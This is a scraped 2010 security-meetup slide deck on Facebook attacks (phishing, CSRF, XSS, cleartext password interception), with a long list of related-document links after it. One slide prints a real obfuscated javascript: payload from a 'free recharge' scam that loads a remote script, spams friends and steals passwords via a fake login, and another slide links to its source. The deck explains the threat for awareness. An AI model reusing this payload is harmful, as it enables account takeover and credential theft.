16
facebook attacks

Facebook Attacks

Tags:

Embed Size (px)

DESCRIPTION

Facebook Attacks by Dinesh @ null Hyderabad Meet, October, 2010

Citation preview

Page 1: Facebook Attacks

facebook attacks

Page 2: Facebook Attacks

PhisingCSRF attackJava scriptsXSS

Page 3: Facebook Attacks

Facebook Phising

Page 4: Facebook Attacks

Facebook CSRF attack

Third party app server

Page 5: Facebook Attacks
Page 6: Facebook Attacks

There are many other attacks possible likeThere are many other attacks possible like

•Brute forcingBrute forcing

•Cookie stealingCookie stealing

•Commercial Data miningCommercial Data mining

•Database Reverse-EngineeringDatabase Reverse-Engineering

Page 7: Facebook Attacks

Password Interception

•The fact that the username and password were sent in clear text The fact that the username and password were sent in clear text is a security vulnerability.is a security vulnerability.

• There are chances to read Facebook user names and There are chances to read Facebook user names and passwords off of the Ethernet or unencrypted wireless traffic, passwords off of the Ethernet or unencrypted wireless traffic, obtaining access to users’ Facebook passwords, as well as any obtaining access to users’ Facebook passwords, as well as any additional accounts they use those passwords for.additional accounts they use those passwords for.

•Also the tabnabbing and CSRF have gained popularity over the Also the tabnabbing and CSRF have gained popularity over the open platformopen platform

Current Facebook Precaution: Current Facebook Precaution:

Facebook currently takes no steps to protect user passwords in transitFacebook currently takes no steps to protect user passwords in transit.

Page 8: Facebook Attacks

javascript:d=document;c=d.createElement(%22script%22);d.body.appendChild(c);c.src=%22ht%22+%22tp:%22+%22//su%22+%22.%22+%22ly%22+%22/%22+%222wL%22;void(0)

FREE!! CELLPHONE RECHARGE::..

This Script very popularly seen on Facebook, Orkut and Many other Social Networking sites.

AnalysingAnalysing and Demo and Demo

Page 9: Facebook Attacks

What does It do?

•It is  sending messages to all my friends to Recharge from It is  sending messages to all my friends to Recharge from accountaccount

•It is adding comments  in Albums of my friendsIt is adding comments  in Albums of my friends

•It is  creating Threads in the Communities I Joined saying It is  creating Threads in the Communities I Joined saying that “Recharge this” also its  adding some other that “Recharge this” also its  adding some other Communities to my listCommunities to my list•Redirects you to the Fake FB login page after 10-15 mins Redirects you to the Fake FB login page after 10-15 mins stealing your passwordstealing your password

Source Script @ http://www.mediafire.com/?t2lagmvsvftww28http://www.mediafire.com/?t2lagmvsvftww28

Page 10: Facebook Attacks

http://www.facebook.com/profile.php?id=100000781542573

www.facebook.com/username

Page 11: Facebook Attacks

The Facebook Platform

API – The API defines the various methods through which you can interact API – The API defines the various methods through which you can interact with Facebook. If you’re not familiar with the idea of an API, take a look at with Facebook. If you’re not familiar with the idea of an API, take a look at some recent Digital Web articles: APIs and Mashups for the Rest of Us and some recent Digital Web articles: APIs and Mashups for the Rest of Us and Hacking on Open APIs.Hacking on Open APIs.

FBML – Facebook Markup Language is a custom markup language based on FBML – Facebook Markup Language is a custom markup language based on various bits of HTML. It’s similar to Coldfusion or ASP.NET’s tag-based various bits of HTML. It’s similar to Coldfusion or ASP.NET’s tag-based syntax, and is used to define the pages in your application.syntax, and is used to define the pages in your application.

FQL – Facebook Query Language is SQL for Facebook. A powerful query FQL – Facebook Query Language is SQL for Facebook. A powerful query language for situations where there are no existing helper methods in the language for situations where there are no existing helper methods in the API, or handy tags in FBML, to do exactly what you need.API, or handy tags in FBML, to do exactly what you need.

Page 12: Facebook Attacks

How to add an application in Facebook

Page 13: Facebook Attacks

How can this be Used For Exploiting?

•You can Upload your own Application of any type.

•So doesn’t this strike you something of a hackers insterest

Page 14: Facebook Attacks

How can this be Used For Exploiting?

Page 15: Facebook Attacks
Page 16: Facebook Attacks

THANK YOUTHANK YOU


DECISION-BASED ADVERSARIAL ATTACKS RELIABLE ATTACKS

DECISION-BASED ADVERSARIAL ATTACKS RELIABLE ATTACKS

Documents
Cyber Attacks & HIPAA Pabrai Compliance: Prepared? · Cyber Attacks & HIPAA Pabrai Compliance: Prepared? Ali Pabrai, MSEE, CISSP (ISSAP, ISSMP) Cyber Attacks & HIPAA ... Cyber Attacks

Cyber Attacks & HIPAA Pabrai Compliance: Prepared? · Cyber Attacks & HIPAA Pabrai Compliance: Prepared? Ali Pabrai, MSEE, CISSP (ISSAP, ISSMP) Cyber Attacks & HIPAA ... Cyber Attacks

Documents
Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks

Documents
Honey-pot profiles and malevolent e-reputation attacks on Facebook

Honey-pot profiles and malevolent e-reputation attacks on Facebook

Documents
Server-side web security (part 1 - attacks)...We illustrate common PHP vulnerabilities: String comparison attacks File inclusion attacks Deserialization attacks SQL injection attacks

Server-side web security (part 1 - attacks)...We illustrate common PHP vulnerabilities: String comparison attacks File inclusion attacks Deserialization attacks SQL injection attacks

Documents
The AP Art History Dinner Party - bremertonschools.org€¦ · facebook facebook facebook facebook facebook facebook facebook faceb facebook facebook facebook fi facebook f; facebook

The AP Art History Dinner Party - bremertonschools.org€¦ · facebook facebook facebook facebook facebook facebook facebook faceb facebook facebook facebook fi facebook f; facebook

Documents
Attacks Ronnau

Attacks Ronnau

Documents
Attacks Only Get Better: Password Recovery Attacks Against ...isg.rhul.ac.uk/tls/RC4passwords.pdf · Attacks Only Get Better: Password Recovery Attacks Against RC4 in TLS Christina

Attacks Only Get Better: Password Recovery Attacks Against ...isg.rhul.ac.uk/tls/RC4passwords.pdf · Attacks Only Get Better: Password Recovery Attacks Against RC4 in TLS Christina

Documents
DVS-Attacks: Adversarial Attacks on Dynamic Vision Sensors

DVS-Attacks: Adversarial Attacks on Dynamic Vision Sensors

Documents
Fileless attacks - Bitdefender · Fileless attacks Fileless Attacks - White Paper Hackers are increasingly turning to fileless attacks because they are 10 times more likely to succeed

Fileless attacks - Bitdefender · Fileless attacks Fileless Attacks - White Paper Hackers are increasingly turning to fileless attacks because they are 10 times more likely to succeed

Documents
Network Security Part II: Attacks Backbone Attacks

Network Security Part II: Attacks Backbone Attacks

Documents
Terror Attacks © 2014 wheresjenny.com Terror Attacks

Terror Attacks © 2014 wheresjenny.com Terror Attacks

Documents
New Exploring and Exploiting iOS Web Browsers · 2020. 4. 12. · This presentation expresses our private opinions. !!! The sample attacks against Google, Facebook and PayPal users

New Exploring and Exploiting iOS Web Browsers · 2020. 4. 12. · This presentation expresses our private opinions. !!! The sample attacks against Google, Facebook and PayPal users

Documents
protection against pharming and phishing attacks - APWG · PDF filePROTECTION AGAINST PHARMING AND PHISHING ATTACKS ... networks such as Facebook are increasing for which ... A code

protection against pharming and phishing attacks - APWG · PDF filePROTECTION AGAINST PHARMING AND PHISHING ATTACKS ... networks such as Facebook are increasing for which ... A code

Documents
Multilateral Privacy Requirements Analysis in Online ...sguerses/slides/S... · xss attacks 1.600.000 protests 740.000newsfeed Facebook API Mobile BEACON protests 50.000 in 3 days

Multilateral Privacy Requirements Analysis in Online ...sguerses/slides/S... · xss attacks 1.600.000 protests 740.000newsfeed Facebook API Mobile BEACON protests 50.000 in 3 days

Documents
JavaScript Zero: Real JavaScript and Zero Side-Channel Attacks · modern web, as well as for browser-based attacks. These attacks include microarchitectural attacks, which exploit

JavaScript Zero: Real JavaScript and Zero Side-Channel Attacks · modern web, as well as for browser-based attacks. These attacks include microarchitectural attacks, which exploit

Documents
Honeypot profiles and malevolent e-reputation attacks on Facebook

Honeypot profiles and malevolent e-reputation attacks on Facebook

Marketing
DNS Attacks

DNS Attacks

Technology
Case study: Stopping evolving attacks –When attacks evolve ... · Case study: Stopping evolving attacks –When attacks evolve every 24 hours. NUDATA SECURITY ©2018 Mastercard

Case study: Stopping evolving attacks –When attacks evolve ... · Case study: Stopping evolving attacks –When attacks evolve every 24 hours. NUDATA SECURITY ©2018 Mastercard

Documents
Terrorist Attacks, Failed Attacks and Plots in the West ...cat-int.org/.../Terrorist-attacks-Report-2013-2016.pdf · Terrorist Attacks, Failed Attacks and Plots in the West linked

Terrorist Attacks, Failed Attacks and Plots in the West ...cat-int.org/.../Terrorist-attacks-Report-2013-2016.pdf · Terrorist Attacks, Failed Attacks and Plots in the West linked

Documents
Analysis of Attack By Matt Kennedy. Different Type of Attacks o Access Attacks o Modification and Repudiation Attacks o DoS Attacks o DDoS Attacks o Attacks

Analysis of Attack By Matt Kennedy. Different Type of Attacks o Access Attacks o Modification and Repudiation Attacks o DoS Attacks o DDoS Attacks o Attacks

Documents
Simple Techniques to Eliminate Severe Attacks: Panic Attacks

Simple Techniques to Eliminate Severe Attacks: Panic Attacks

Self Improvement
Facebook Attacks By dinesh

Facebook Attacks By dinesh

Education
A Study of Malicious Attacks on Facebook · A Study of Malicious Attacks on Facebook Maria Patricia Revilla, Anti-Malware Analyst Commtouch VirusLab Robert Sandilands, Director Commtouch

A Study of Malicious Attacks on Facebook · A Study of Malicious Attacks on Facebook Maria Patricia Revilla, Anti-Malware Analyst Commtouch VirusLab Robert Sandilands, Director Commtouch

Documents
How Brands Respond to Facebook Attacks: Top Tweets

How Brands Respond to Facebook Attacks: Top Tweets

Business
PRACTICAL ATTACKS ON VOLTE AND VOWIFIVoLTE attacks: The attacks mainly include free data channel, DoS and side-channel attacks on the IMS. Li et al. [5] presents two types of attacks

PRACTICAL ATTACKS ON VOLTE AND VOWIFIVoLTE attacks: The attacks mainly include free data channel, DoS and side-channel attacks on the IMS. Li et al. [5] presents two types of attacks

Documents
Attacks Attacks AND Attacks!

Attacks Attacks AND Attacks!

Internet
[heaven] Fan attacks sur Facebook

[heaven] Fan attacks sur Facebook

Marketing
How Hackers Hack Facebook Facebook Phishing …engineersclub.weebly.com/uploads/2/7/9/4/27944707/phishing.pdf · How Hackers Hack Facebook Facebook Phishing Attacks & Security

How Hackers Hack Facebook Facebook Phishing …engineersclub.weebly.com/uploads/2/7/9/4/27944707/phishing.pdf · How Hackers Hack Facebook Facebook Phishing Attacks & Security

Documents
Automatic Creation of SQL Injection and Cross-Site Scripting Attacks 2nd-order XSS attacks 1st-order XSS attacks SQLI attacks Adam Kiezun, Philip J. Guo,

Automatic Creation of SQL Injection and Cross-Site Scripting Attacks 2nd-order XSS attacks 1st-order XSS attacks SQLI attacks Adam Kiezun, Philip J. Guo,

Documents